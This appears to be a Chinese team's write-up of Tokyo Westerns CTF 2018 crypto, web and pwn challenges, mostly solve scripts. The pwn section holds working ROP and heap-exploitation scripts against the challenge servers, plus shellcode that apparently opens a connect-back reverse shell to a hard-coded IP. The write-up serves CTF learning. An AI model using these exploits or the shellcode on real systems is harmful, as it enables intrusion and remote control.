scs7 | Crypto
from zio import * target=("crypto.chal.ctf.westerns.tokyo",14791) def cr(io,m): io.read_until("message: ") io.writeline(m) io.read_until(": ") c=io.read_until("n")[:-1] return c def score(get_c,c): score=0 for i in range(len(get_c)): if get_c[i]!=c[i]: return score else: score+=1 return score import string def guess_(i,pre): io = zio(target, timeout=10000, print_read=COLORED(NONE, 'red'), print_write=COLORED(NONE, 'green')) io.read_until("encrypted flag: ") c = io.read_until("n")[:-1] max_score=0 max_value=[] for g in string.printable: get_c=cr(io,pre+g+"a"*(47-len(pre+g))) tmp_score=score(get_c,c) #print g,tmp_score if tmp_score>max_score: max_score=tmp_score max_value=[g] elif tmp_score==max_score: max_value.append(g) return max_value,max_score import time def guess(i,pre=""): print "guess work with pre-str:",pre while 1: try: return guess_(i,pre) except Exception,e: print e time.sleep(2) pre="TWCTF{67ced" last_already_calc=0 last_max_value=0 last_max_score=[] for i in range(47): if last_already_calc==0: max_value,max_score=guess(i,pre) else: max_value, max_score=last_max_value,last_max_score last_already_calc=0 if len(max_value)==1: pre=pre+max_value[0] print "succuess:",pre continue else: tmp_max_score=0 tmp_max_value=[] tmp_chosen_value=0 print "guess",max_value for multi_value in max_value: tmp_value,tmp_score=guess(i,pre+multi_value) if tmp_score>tmp_max_score: tmp_max_score=tmp_score tmp_max_value=tmp_value tmp_chosen_value=multi_value pre=pre+tmp_chosen_value print "succuess:", pre last_max_score=tmp_max_score last_max_value=tmp_max_value last_already_calc=1 print pre
rsa | Crypto
n=0x8529063EA0AD3B46296F92F72356772EA4E703F7B79220C18DE1B7E3CA0A7728D19E69DC48B8685CD604F5887A4F8F3A945A1CA1593CF086D348EC4DC92142083FC9E2203C6530311EE510BE50A42AEE4A63E7FA66BFCE3512FC2FB117402A55CDF0897770C1BB86F2D9306DA5B899D294EDBCB17AD87E17592CCC3F62B1305724181732AC7474CF23BEB722833373EF07B6A92188CF28BCFEF26B2368ADA38F7F4FD8921DBE3B6488E4B92028FFBD46AE26D8B43C9A86DBBC63F0B51398BB54098FF7004B646AFB42F24354AB6A2D30EFEEE8B333473ABE1CC92EB68A465819D9E9A0FF58FEAF2C722AE65B7CEDC9E30BE915029D69342523B981AD8395CDF7 e=0x10001
eq = 1 mod p
p | eq-1
n | (eq-1)q
delta=1-4 e (-kn)=1+4ken
脚本1: 爆破delta
n=0x8529063EA0AD3B46296F92F72356772EA4E703F7B79220C18DE1B7E3CA0A7728D19E69DC48B8685CD604F5887A4F8F3A945A1CA1593CF086D348EC4DC92142083FC9E2203C6530311EE510BE50A42AEE4A63E7FA66BFCE3512FC2FB117402A55CDF0897770C1BB86F2D9306DA5B899D294EDBCB17AD87E17592CCC3F62B1305724181732AC7474CF23BEB722833373EF07B6A92188CF28BCFEF26B2368ADA38F7F4FD8921DBE3B6488E4B92028FFBD46AE26D8B43C9A86DBBC63F0B51398BB54098FF7004B646AFB42F24354AB6A2D30EFEEE8B333473ABE1CC92EB68A465819D9E9A0FF58FEAF2C722AE65B7CEDC9E30BE915029D69342523B981AD8395CDF7 e=0x10001 import primefac import gmpy2 k=0 while 1: k+=1 delta=1+4*k*e*n if gmpy2.iroot(delta,2)[1]==True: print k print gmpy2.iroot(delta,2) gmpy2.iroot(delta,2)[0]
n=0x8529063EA0AD3B46296F92F72356772EA4E703F7B79220C18DE1B7E3CA0A7728D19E69DC48B8685CD604F5887A4F8F3A945A1CA1593CF086D348EC4DC92142083FC9E2203C6530311EE510BE50A42AEE4A63E7FA66BFCE3512FC2FB117402A55CDF0897770C1BB86F2D9306DA5B899D294EDBCB17AD87E17592CCC3F62B1305724181732AC7474CF23BEB722833373EF07B6A92188CF28BCFEF26B2368ADA38F7F4FD8921DBE3B6488E4B92028FFBD46AE26D8B43C9A86DBBC63F0B51398BB54098FF7004B646AFB42F24354AB6A2D30EFEEE8B333473ABE1CC92EB68A465819D9E9A0FF58FEAF2C722AE65B7CEDC9E30BE915029D69342523B981AD8395CDF7 e=0x10001 sqt_delta=15437412055699760033228916416773388687758495883388405427219519968006361800232351092586513254042697417365303248564432783709932135844205171385876634738995524060511238569866876444551767422579436935801803651623293057191182325987659215635528040854348013316932722970176956521681782203617683425665727504728779196852929921 q=(1+sqt_delta)/(2*e) import primefac print primefac.isprime(q) print q p=n/q d=primefac.modinv(e,(p-1)*(q-1))%((p-1)*(q-1)) c=int(open("flag.encrypted","rb").read().encode("hex"),16) m=pow(c,d,n) print ("0"+hex(m)[2:-1]).decode("hex")
mixed cipher | Crypto
rsa:n 1024bit 未知, e 65537
aes:key 16字节随机,pkcs padding,密文前16字节是iv
1 算n
x^e =c mod n
所以 n | x^e -c
2 RSA parity oracle
3 伪随机数攻击
from zio import * import primefac from Crypto.Util.number import long_to_bytes,bytes_to_long target=("crypto.chal.ctf.westerns.tokyo",5643) e=65537 def get_enc_key(io): io.read_until("4: get encrypted keyn") io.writeline("4") io.read_until("here is encrypted key :)n") c=int(io.readline()[:-1],16) return c def encrypt_io(io,p): io.read_until("4: get encrypted keyn") io.writeline("1") io.read_until("input plain text: ") io.writeline(p) io.read_until("RSA: ") rsa_c=int(io.readline()[:-1],16) io.read_until("AES: ") aes_c=io.readline()[:-1].decode("hex") return rsa_c,aes_c def decrypt_io(io,c): io.read_until("4: get encrypted keyn") io.writeline("2") io.read_until("input hexencoded cipher text: ") io.writeline(long_to_bytes(c).encode("hex")) io.read_until("RSA: ") return io.read_line()[:-1].decode("hex") def get_n(io): rsa_c,aes_c=encrypt_io(io,long_to_bytes(2)) n=pow(2,65537)-rsa_c for i in range(3,6): rsa_c, aes_c = encrypt_io(io, long_to_bytes(i)) n=primefac.gcd(n,pow(i,65537)-rsa_c) return n def check_n(io,n): rsa_c, aes_c = encrypt_io(io, "123") if pow(bytes_to_long("123"), e, n)==rsa_c: return True else: return False import gmpy2 def guess_m(io,n,c): k=1 lb=0 ub=n while ub!=lb: print lb,ub tmp = c * gmpy2.powmod(2, k*e, n) % n if ord(decrypt_io(io,tmp)[-1])%2==1: lb = (lb + ub) / 2 else: ub = (lb + ub) / 2 k+=1 print ub,len(long_to_bytes(ub)) return ub io = zio(target, timeout=10000, print_read=COLORED(NONE, 'red'),print_write=COLORED(NONE, 'green')) n=get_n(io) print check_n(io,n) c=get_enc_key(io) print len(decrypt_io(io,c))==16 m=guess_m(io,n,c) for i in range(m - 50000,m+50000): if pow(i,e,n)==c: aeskey=i print long_to_bytes(aeskey)[-1]==decrypt_io(io,c)[-1] print "found aes key",hex(aeskey) import fuck_r next_iv=fuck_r.get_state(io) print "##########################################" print next_iv print aeskey io.interact()
算随机数的python lib和java lib
from Crypto.Util.number import long_to_bytes,bytes_to_long def encrypt_io(io,p): io.read_until("4: get encrypted keyn") io.writeline("1") io.read_until("input plain text: ") io.writeline(p) io.read_until("RSA: ") rsa_c=int(io.readline()[:-1],16) io.read_until("AES: ") aes_c=io.readline()[:-1].decode("hex") return rsa_c,aes_c import subprocess import random def get_iv(io): rsa_c, aes_c=encrypt_io(io,"1") return bytes_to_long(aes_c[0:16]) def splitInto32(w128): w1 = w128 & (2**32-1) w2 = (w128 >> 32) & (2**32-1) w3 = (w128 >> 64) & (2**32-1) w4 = (w128 >> 96) return w1,w2,w3,w4 def sign(iv): # converts a 32 bit uint to a 32 bit signed int if(iv&0x80000000): iv = -0x100000000 + iv return iv def get_state(io): numbers=[] for i in range(156): print i numbers.append(get_iv(io)) observedNums = [sign(w) for n in numbers for w in splitInto32(n)] o = subprocess.check_output(["java", "Main"] + map(str, observedNums)) stateList = [int(s) % (2 ** 32) for s in o.split()] r = random.Random() state = (3, tuple(stateList + [624]), None) r.setstate(state) return r.getrandbits(128) ''' target=("crypto.chal.ctf.westerns.tokyo",5643) io = zio(target, timeout=10000, print_read=COLORED(NONE, 'red'),print_write=COLORED(NONE, 'green')) print get_state(io) print get_iv(io) io.interact()'''
public class Main { static int[] state; static int currentIndex; public static void main(String[] args) { state = new int[624]; currentIndex = 0; // initialize(0); // for (int i = 0; i < 5; i++) { // System.out.println(state[i]); // } // for (int i = 0; i < 5; i++) { // System.out.println(nextNumber()); // } if (args.length != 624) { System.err.println("must be 624 args"); System.exit(1); } int[] arr = new int[624]; for (int i = 0; i < args.length; i++) { arr[i] = Integer.parseInt(args[i]); } // int[] arr = new int[] {-668203059, 1654615998, -1039577940, -471398782, 1806341205, 173879092, 1112038970, -148327174, -2099059102, 2087043557, 1739178872, -351180877, -928577991, -730776224, 1302718217, -138297977, 2046968324, 1537810351, -1789360513, -465313928, -394652141, 938204377, -2127353738, 598176026, 1210484339, 600203567, -1048812935, 407295012, -1639092676, -861559391, 1075916535, -54721341, -387636886, -2007623918, -73935819, -1266275551, -815110754, -1709817594, -420194037, 631194409, 1332073689, 424185324, -1160363781, 316721330, -434486244, -642210028, -1357278678, 1418186270, 2027837527, -1890585826, 432508404, 1519522183, 1864753826, 1358054485, -1671227719, -1544369729, -373614660, 878225224, -143424575, -1921896188, 2048741382, 1901353491, -578489442, -2055770470, 1118805955, 267488770, -837399110, -350190618, -1938321754, -360800951, 60308648, 400599612, -1203859220, -686802991, 1712934065, -1244452074, -752285108, -923212848, -1425271167, -1609471003, 4908357, -1666889315, 2119900799, -738462598, -568641750, 1430804514, 1047589226, -1158444678, 1396742090, -1272845589, -556321816, 270515404, 820626892, -356400817, -1857527217, 952210990, 1024847607, -844626580, -139413550, 612008755, -845337731, -1962843199, 1924014660, 391769539, 345512145, -29113186, 1374624034, -536496032, -2113378858, -8711794, -288476533, 2101470722, 468399889, 1294704107, -1927292489, 1250224899, -1260309123, 536057929, -1943726486, 1429152570, -796858770, -333934853, -1974466879, 872745308, -155312270, -861454009, -1704304750, -1944631897, -1771171209, 1235478542, 1911213317, 393556845, -1733934739, -867862495, 1653137829, 1361705852, -1822565006, 1039842312, 1246955724, 789710164, 813429542, -766792476, 801997237, 141615452, -1663126554, -80317000, -1474636681, 1116932915, 2046685052, 296718909, 385792672, -1379870086, -1041083208, 559309739, -529267221, 642313784, -329076024, 165964262, -676628184, 344663896, -437343114, -1291398744, -330358405, -732889526, -1973108295, -1359364085, 1680603714, -696363523, -1265798159, -2041939376, 1183839549, -2053895897, -809048539, 1011472239, -646452845, 924282500, -450804218, -1376647162, -1761790512, -750488432, -215758220, 1801409089, -1805196174, 1182021441, 1935153793, 2115938757, -1459234992, -1541047910, -16072463, -1287521587, -356734768, -75332083, -887661990, 1534881946, 353789296, 1392964597, -1663083898, 495423391, 2089261940, -1773500660, -1588505081, 1439975734, -665386750, 817670926, 1043830061, 69617246, -1153245006, 1164099199, 503087954, -1265584632, 946870804, 1597986360, -882259400, 732213632, 1428231901, 1830219288, -790647229, 267114565, 432105997, -931498909, 628604922, -621384609, -1298494714, 939625287, 194278833, -785462332, -1830231447, -1571071491, -386478286, -272645730, -2000604499, -1708664744, -1371859220, 317814271, 114661864, 534481714, -1567663440, 809689893, -1690763648, -729774497, -1821268193, 514088150, 1680231637, 393126321, 1589738942, -713632747, -83680351, 498414388, 156302611, -1694346684, 92928119, 835761764, -167369407, -125877251, 794448426, -1210694021, 532125690, 2058292873, 904419226, -1171859375, -855786853, 262357606, -270715400, -1377193292, 97850419, -1957493987, 1828018965, -1629510694, 435940125, -704792726, 1116347426, 300666185, 948454521, 309116047, -1516442472, 1293049471, 1504501144, 1872900585, 774459493, 262175295, -2131864978, 2006313350, 169130250, -1733084050, 433453424, -1291397376, -50529663, 1680518472, 856226606, 1117263813, 1539983294, -410604745, -1152776501, 2019563010, -694382142, -419600152, -350116874, -1847830033, 727673138, -1298381187, -1405998062, 873659410, -143671368, -999231257, 249326891, -907748686, -1390702752, 679500893, -663896303, 695587449, 1470221169, -2020892821, 1076693935, 503425332, -1731767803, -337505432, 1899724293, -1436212053, 750843993, 56709708, 2025615733, -1368889078, 1760530271, -429075602, -1850646691, -537709749, -2110546397, -354287010, 1337650368, -1507819197, 1533954791, 1669205724, -697239960, -1470527220, 1077747587, 658902818, -1887207689, -1327906134, 53413578, 1966898329, -1109929573, 339619332, 1442750606, -1120917222, 196264944, -1957132854, 1206384019, 579123108, 1031352225, -1021486441, -201307945, 2069431579, 1512797275, -1674454606, 1236426221, -1402721460, 1542757380, -1759743955, -228037718, -464098948, -1573040995, -628034252, -1627462556, 568414356, -1221405585, 1332717957, 1666521335, -1080244923, 1779911708, -734856997, -1499661435, 346703132, 6546479, -1741278839, 825963191, -1294577489, 1436244341, 687537412, 1028283729, 958197830, -1557357713, 1924726585, 1626281073, -1244037385, -535052464, -1401124861, -1854775542, -538856697, 1779861933, 135486808, 1727723913, -551095017, -1280632020, -1857692155, 1796269370, -978454911, -1450857631, -1249809548, 200917231, 711568583, 1912773091, 274389611, 1113371136, -1281978281, 677258676, 1917121846, -2029057972, -494155265, 2092789797, -394965805, -1883751509, -1700904176, -1050184897, 297036, -498752416, 167117967, 2124216399, 1399918423, 1340279962, -696914953, 2005286885, 214134156, -820141808, -761412129, -536800795, -110909457, -805671715, 1783001626, 807459420, -1938911177, -2489546, -158751579, -1575871803, -92033628, 358488241, -698153827, -1178735059, 560586626, -56601290, 63261809, 1725790100, -216691700, -1380767541, 1793084754, 1357970475, 14572021, 917081460, 61380729, -1214083574, -1053324315, 10125659, -84848613, -761362797, -1392592053, -2025738607, -1666181183, 419980565, 818019178, 510688338, -1682082547, -1506393508, 852621339, -542652691, 1298867023, 1202516726, -1337710518, -92276545, 782633881, 430272795, 2042709959, -627331049, -331701484, 1703797118, -1599277879, 349375932, 93825718, 1179886944, -369877824, 1945526488, -859746991, -891886316, 497268706, -595454681, 1101610896, 573036909, -1487918463, -2057866902, -784805552, -1499874592, -1524968205, 1490581366, 494390848, -550340611, 663315337, 1195761054, -638920410, 79776130, 181666837, 174647438, 883628285, -1370108417, 1115271501, -1896847660, 1351683036, -229769768, 1575796842, -264403350, -1857711698, -387186253, -646659770, 180408077, -659879120, -1077457751, -166632242, -1282800133, -1685360223, -1480209529, 2123799795, -1235414490, -1528392247, -417856734, 1969948437, -1545581765, 1870203225, 1599657397, -552286702, -1984580760, 765742497, 892683641, 1613099182, -1773282441, 1249987923, 38212703, 594668076, 648639589, 1165540019, 1431978117, 1449598999, -903561651, 1577118317, -1209035748, 402470710, 1452798332, -947397125, -1629776398, 153182031, 176965319, 1158018294, 703775687, 641736990, -77678490, -1789063561, 1243525559, 1550082102, 1695618646, -45943145, -1939245169, 556803596, 1260173501, 493476348, 2053272110, -1157400341, 1029529788, -284524051, 207259503, 1322333523, 771319623, -614023206, -2048483671, -1165393187, 304353766, 1299960583, 1731598297, -706265537, 1410985724, 1285163745, 1781215744, 466654280, 426921187, -1886220859, -392312811, 2066619266, 2035834473, 1447749897, -683551223, -868123012, -102093724, -806042261, 1475972382, 533970967, 2057660952, 498250834, -1290228404, 2137753491, 1831955274, 162454480, 1296664028, 1439165853, -1139235829, -1343850230, -453549474, 668572195, -344933787, 715353335, -1603130720, -1870512422, 1613066649, -832714745, -109261737, -36508294, -1551004932, 373326185, 282757781, -825610525, 363653025, 850576530, -1074302002, 949439989, 262663685, 1652754537, 33719836, 421235423, 1691392275, -1904927049}; rev(arr); for (int i = 0; i < 624; i++) { System.out.println(state[i]); } // System.out.println("currentIndex " + currentIndex); // System.out.println("state[currentIndex] " + state[currentIndex]); // System.out.println("next " + nextNumber()); // want -2065863258 } static void nextState() { // Iterate through the state for (int i = 0; i < 624; i++) { // y is the first bit of the current number, // and the last 31 bits of the next number int y = (state[i] & 0x80000000) + (state[(i + 1) % 624] & 0x7fffffff); // first bitshift y by 1 to the right int next = y >>> 1; // xor it with the 397th next number next ^= state[(i + 397) % 624]; // if y is odd, xor with magic number if ((y & 1L) == 1L) { next ^= 0x9908b0df; } // now we have the result state[i] = next; } } static int nextNumber() { currentIndex++; int tmp = state[currentIndex]; tmp ^= (tmp >>> 11); tmp ^= (tmp << 7) & 0x9d2c5680; tmp ^= (tmp << 15) & 0xefc60000; tmp ^= (tmp >>> 18); return tmp; } static void initialize(int seed) { // http://code.activestate.com/recipes/578056-mersenne-twister/ // global MT // global bitmask_1 // MT[0] = seed // for i in xrange(1,624): // MT[i] = ((1812433253 * MT[i-1]) ^ ((MT[i-1] >> 30) + i)) & bitmask_1 // copied Python 2.7's impl (probably uint problems) state[0] = seed; for (int i = 1; i < 624; i++) { state[i] = ((1812433253 * state[i - 1]) ^ ((state[i - 1] >> 30) + i)) & 0xffffffff; } } static int unBitshiftRightXor(int value, int shift) { // we part of the value we are up to (with a width of shift bits) int i = 0; // we accumulate the result here int result = 0; // iterate until we've done the full 32 bits while (i * shift < 32) { // create a mask for this part int partMask = (-1 << (32 - shift)) >>> (shift * i); // obtain the part int part = value & partMask; // unapply the xor from the next part of the integer value ^= part >>> shift; // add the part to the result result |= part; i++; } return result; } static int unBitshiftLeftXor(int value, int shift, int mask) { // we part of the value we are up to (with a width of shift bits) int i = 0; // we accumulate the result here int result = 0; // iterate until we've done the full 32 bits while (i * shift < 32) { // create a mask for this part int partMask = (-1 >>> (32 - shift)) << (shift * i); // obtain the part int part = value & partMask; // unapply the xor from the next part of the integer value ^= (part << shift) & mask; // add the part to the result result |= part; i++; } return result; } static void rev(int[] nums) { for (int i = 0; i < 624; i++) { int value = nums[i]; value = unBitshiftRightXor(value, 18); value = unBitshiftLeftXor(value, 15, 0xefc60000); value = unBitshiftLeftXor(value, 7, 0x9d2c5680); value = unBitshiftRightXor(value, 11); state[i] = value; } } }
from Crypto.Util.number import long_to_bytes c="232323232323232323232323232323236ac90897e6138c3ffde3666669fdca767a03e4b5e44f309fa322df4d4a27dbaae7a5b335be00e82a4150a18fb461adfd39e4c7e9bb00ba6edb59a1f37dda3f28".decode("hex") iv=long_to_bytes(83345920849977169166026104781978405220) key=long_to_bytes(102748041203696210196740355202977186893) from Crypto.Cipher import AES aes = AES.new(key, AES.MODE_CBC,iv) print aes.decrypt(c[16:])
Simple auth | web
http://simpleauth.chal.ctf.westerns.tokyo/?action=auth&hashed_password=c019f6e5cd8aa0bbbcc6e994a54c757etw playing card | reverse
v23 = lucky_enough_4017B0(player_cards); v24 = print_40BDA0((signed __int64 *)&ending_410CA0); ending = v24; if ( v23 ) { v28 = sub_410960(ciphernimstr_6152C8, player_cards_packages_6152C0); ending = sub_40E170(ending, *v28); memcpy((char *)ending + *ending + 16, v28 + 2, *v28 + 1); *ending += *v28; LABEL_20: v26 = (const char *)(ending + 2); } else { if ( v24 ) goto LABEL_20; v26 = (const char *)&unk_410C84; }
Swap Return | Pwn
- 把printf和atoi交换以后可以leak出stack的地址,
- 通过partialoverwrite来覆盖setvbuf来得到gets的地址。
- 把stack_check_failed改成ret
- 把atoi换成gets
from pwn import * local=1 pc='/tmp/pwn/swap_returns_debug' remote_addr="swap.chal.ctf.westerns.tokyo" remote_port=37567 aslr=False libc=ELF('./libc.so.6') #libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so') #libc=ELF('/lib/i386-linux-gnu/libc-2.23.so') #context.log_level=True if local==1: p = process(pc,aslr=aslr,env={'LD_PRELOAD': './libc.so.6'}) gdb.attach(p,'c') else: p=remote(remote_addr,remote_port) ru = lambda x : p.recvuntil(x) sn = lambda x : p.send(x) rl = lambda : p.recvline() sl = lambda x : p.sendline(x) rv = lambda x : p.recv(x) sa = lambda a,b : p.sendafter(a,b) sla = lambda a,b : p.sendlineafter(a,b) def lg(s,addr): print('33[1;31;40m%20s-->0x%x33[0m'%(s,addr)) def raddr(a=6): if(a==0): return u64(rv(a).ljust(8,'x00')) else: return u64(rl().strip('n').ljust(8,'x00')) def set_addr(addr1,addr2): sla("choice:",'1') sla("address:",str(addr1)) sla("address:",str(addr2)) def sw(): sla("choice:",'2') fuck=0x601500 save=0x601700 zero=0x601800 def make_byte(bt): global fuck global save global zero i=0 for k in range(len(bt)): byte=u8(bt[i]) set_addr(fuck+byte,stack_addr) sw() set_addr(fuck+byte+1,zero) sw() set_addr(fuck+byte,save+i) sw() i+=1 zero+=8 if __name__ == '__main__': sla("choice:",'9') rl() atoi=0x601050 printf=0x0601038 stack_check_failed=0x601030 setvbuf=0x601048 bss=0x601100 set_addr(atoi,printf) sw() sa("choice:",'%x') rv(8) stack_addr=int('7fff'+rv(8),16)-6+0x30 lg('stack_addr',stack_addr) sa("choice:",'ax00') sla("address:",str(atoi)) sla("address:",str(printf)) sa("choice:",'aa') set_addr(bss,setvbuf) sw() set_addr(bss+0x100,stack_check_failed) sw() make_byte(p16(0x6ff0)) set_addr(bss-6,save-6) sw() make_byte(p16(0x8e8)) set_addr(bss+0x100-6,save-6) sw() set_addr(bss+0x100,stack_check_failed) sw() puts_plt=0x4006A0 poprdiret=0x0400a53 puts_got=0x601028 poprbpret=0x0000000000400760 leaveret=0x4008E7 payload='A'*22+p64(poprbpret)+p64(save-8)+p64(leaveret) payload2=p64(poprdiret)+p64(puts_got)+p64(puts_plt)+p64(0x40088E) make_byte(payload2) set_addr(bss,atoi) sw() sla("choice:",payload) ru(": n") puts_addr=raddr(6) lg("puts addr",puts_addr) libc.address=puts_addr-libc.symbols['puts'] one_shot=libc.address+0x4557a sl(cyclic(20)+p64(one_shot)) p.interactive()
BBQ| Pwn
- 利用ptr未初始化leak出堆地址。然后结合buy的输入,可以做到任意地址free
- 伪造一个fake的non-fastbin chunk,free,leak出libc的地址
- 在malloc_hook附件伪造一个0x21的size
- 在main_arean那里伪造一个Food struct,使得food的amount对于fastbin[0]的fd,这样我们就可以通过修改amount来让fastbin的fd指向malloc_hook伪造0x21处
- fastbin attack来修改malloc_hook,再用one gadget
英文版的wp可以访问 https://changochen.github.io/2018/09/01/Tokyo-Western_CTF-2018/
from pwn import * local=0 pc='/tmp/pwn/BBQ_debug' remote_addr="pwn1.chal.ctf.westerns.tokyo" remote_port=21638 aslr=True libc=ELF('./libc.so.6') #libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so') #libc=ELF('/lib/i386-linux-gnu/libc-2.23.so') context.log_level=True if local==1: #p = process(pc,aslr=aslr) p = process(pc,aslr=aslr,env={'LD_PRELOAD': './libc.so.6'}) gdb.attach(p,'c') else: p=remote(remote_addr,remote_port) ru = lambda x : p.recvuntil(x) sn = lambda x : p.send(x) rl = lambda : p.recvline() sl = lambda x : p.sendline(x) rv = lambda x : p.recv(x) sa = lambda a,b : p.sendafter(a,b) sla = lambda a,b : p.sendlineafter(a,b) def lg(s,addr): print('33[1;31;40m%20s-->0x%x33[0m'%(s,addr)) def raddr(a=6): if(a!=0): return u64(rv(a).ljust(8,'x00')) else: return u64(rl().strip('n').ljust(8,'x00')) def choice(idx): sla("Choice: ",str(idx)) def buy(name,amount): choice(1) sla(">> ",name) sla(">> ",str(amount)) def grill(name,idx): choice(2) sla(">> ",name) sla(">> ",str(idx)) def eat(idx): choice(3) sla(">> ",str(idx)) if __name__ == '__main__': name='x'*0x10+p64(0xDEADBEEF11)[:5] buy('A'*(62-0x20),123) buy(p64(0xDEADBEEF11),0xe1) buy(name,123) grill(name,0) grill(name,1) eat(0) eat(1) buy('C'*39,123) eat(5) choice(1) ru("* ") ru("* ") heap_addr=raddr(6)-0x110 lg("heap_addr",heap_addr) sla(">> ","Beef") sla(">> ",str(1)) buy('C'*40+p64(heap_addr+0xb0),123) eat(5) buy(p64(heap_addr+0xd0),123) choice(1) ru("121") ru("* ") libc_addr=raddr(6)-0x3c4b78 libc.address=libc_addr lg("Libc address",libc_addr) sla(">> ","Beef") sla(">> ",str(1)) # create a 0x21 above malloc hook buy(p64(libc.symbols['__malloc_hook']-0x18),123) choice(1) k=ru('food na').split(' ') code=k[-3] num=(int(k[-2].split('n')[0][1:-1])) left=0x100000000-num-0x1 sla(">> ",code) sla(">> ",str(0x1)) while(left>0): if(left<0x7FFFFFFF): buy(code,left+0x21) break else: buy(code,0x7FFFFFFF) left-=0x7FFFFFFF buy(p64(heap_addr+0xd0),123) buy(p64(heap_addr+0x10),123) buy('a'*0x10+p64(0xDEADBEEF11),0x31) buy(p64(0xDEADBEEF11),0x31) buy('fuck1',0x31) buy('C'*40+p64(heap_addr+0x1e0),123) eat(5) grill('Beef',0) eat(0) # fake a food structure in main_arena buy(p64(0xDEADBEEF11),0xb1) buy('k'*0x2+p64(heap_addr+0x10),123) buy('c'*0x1+p64(0xDEADBEEF11),123) buy(p64(libc.symbols['__malloc_hook']+0x10),123) buy('C'*40+p64(heap_addr+0x2c0),123) eat(5) buy("H"*0x10+p64(heap_addr+0x390),123) grill('',0) eat(0) ## modify fastbin[1]'s first pointer to point to a little above malloc hook left=0x100000000-0x210 while(left>0): if(left<0x7FFFFFFF): buy(p64(heap_addr+0x150),left) break else: buy(p64(heap_addr+0x150),0x7FFFFFFF) left-=0x7FFFFFFF grill("H"*0x10+p64(heap_addr+0x390),1) eat(1) oneshot=libc.address+0x4526a buy(cyclic(0x8)+p64(oneshot),123) grill(p64(heap_addr+0x150).ljust(64,'x00'),1) p.interactive()
load | Pwn
题目让输入一个文件,然后输入一个offset和size,之后会通过一个函数将这个文件加载到栈上,加载之后close 了0 1 2 三个fd,由于没有开启canary,所以可以进行栈溢出,于是思考到要想办法控制这个输入,所以通过/proc/self/fd/0进行读取,则会读取stdin,于是可以进行read tdin,进而进行rop。
from pwn import * context(os='linux', arch='amd64', log_level='debug') DEBUG = 0 if DEBUG: p = process('./load') else: p = remote('pwn1.chal.ctf.westerns.tokyo', 34835) SHELLCODE = "x68x76xbex45x25x66x68xd4xacx66x6ax02x6ax2ax6ax10x6ax29x6ax01x6ax02x5fx5ex48x31xd2x58x0fx05x48x89xc7x5ax58x48x89xe6x0fx05x48x31xf6xb0x21x0fx05x48xffxc6x48x83xfex02x7exf3x48x31xc0x48xbfx2fx2fx62x69x6ex2fx73x68x48x31xf6x56x57x48x89xe7x48x31xd2xb0x3bx0fx05x00"; def main(): filename_start = 0x601040 pop_rdi_ret = 0x400a73 pop_rsi_r15_ret = 0x400a71 open_at_plt = 0x400710 lseek_at_plt = 0x4006d8 puts_at_plt = 0x4006c0 atoi_at_plt = 0x400718 write_to = 0x400817 pops_ret = 0x400a6a movs_call = 0x400a51 lseek_at_got = 0x600fb8 raw_input() p.recvuntil('Input file name:') fd_name = '/proc/self/fd/0' mem_name = '/proc/self/mem' payload = fd_name + 'x00' + mem_name + 'x00' shellcode_at_num = len(payload) payload += SHELLCODE pos_at_num = len(payload) payload += "1x00" rop_at_num = len(payload) #payload += p64(pop_rdi_ret) #payload += p64(filename_start + shellcode_at_num) #payload += p64(puts_at_plt) #payload += p64(0x400816) p.sendline(payload) p.recvuntil('Input offset:') p.sendline('0') payload = 'a' * (56 - 8) + p64(filename_start + rop_at_num) payload += p64(pop_rdi_ret) payload += p64(filename_start + len(fd_name) + 1) # rdi = "/proc/self/mem" payload += p64(pop_rsi_r15_ret) payload += p64(0) payload += p64(0) # rsi = r15 = 0 payload += p64(open_at_plt) # open("/proc/self/mem", 2) -> fd = 0 payload += p64(pop_rdi_ret) payload += p64(filename_start + len(fd_name) + 1) payload += p64(pop_rsi_r15_ret) payload += p64(2) payload += p64(0) # rsi = r15 = 0 payload += p64(open_at_plt) # open("/proc/self/mem", 2) -> fd = 1 payload += p64(pops_ret) payload += p64(0) # rbx + 1 == rbp -> edx payload += p64(1) # rbp payload += p64(lseek_at_got) # r12 call r12 + rbx * 8 payload += p64(0) # r13 payload += p64(write_to) # r14 -> rsi payload += p64(1) # r15 (r15d) -> edi payload += p64(movs_call) payload += p64(0) # dummy payload += p64(0) # rbx after payload += p64(0) # rbp after payload += p64(0) # r12 after payload += p64(0) # r13 after payload += p64(0) # r14 after payload += p64(0) # r15 after payload += p64(pop_rdi_ret) payload += p64(filename_start + shellcode_at_num) payload += p64(puts_at_plt) payload += p64(write_to) p.recvuntil('size: ') p.sendline(str(len(payload))) p.send(payload) p.interactive() if __name__ == '__main__': main()
neighbor_c | Pwn
题目逻辑比较简单,两次call函数,之后进行不停的fgets 0x100到stderr,然后fprintf。
(以下为把sleep patch后的调试版本,原函数在while中,fprintf后会sleep 1秒,且在进入时会sleep3秒)
所以可以往栈上已经有的位置写东西,然后由于两次call函数,所以存在多个指向栈上的指针,这样就可以通过partial write(写一个字节的方式)来控制一个指向栈上的指针指向栈上想要改动的东西。(但由于栈最后一个字节存在变动,所以需要16次爆破)
得到leak的地址之后,就可以通过先改动指向栈上指针的低地址从而改动栈上任意位置的值,之后可以利用栈上被任意改动的值来做到任意写,把one gadget写入malloc hook,通过触发fprintf时的malloc来getshell。(但由于libc里stdout结构体位于X600,而stderr位于X520,这个X没法确定,所以需要半个字节,也就是16次爆破)
最终我们需要16 × 16 = 256次爆破,还算是可以接受的范围,因为有sleep 3秒。
(我的exp是一开始错误的思路,试图改写vtable来bypass 2.24的check,但是由于触发overflow需要0x2000个字节的输入,明显这题做不到,所以失败了,但是调试过程发现malloc触发了,所以直接改动了,把写vtable改成了写malloc hook getshell的,所以比较混乱)
(下次有爆破记得cat fla*。。搞得我爆破了好几次)
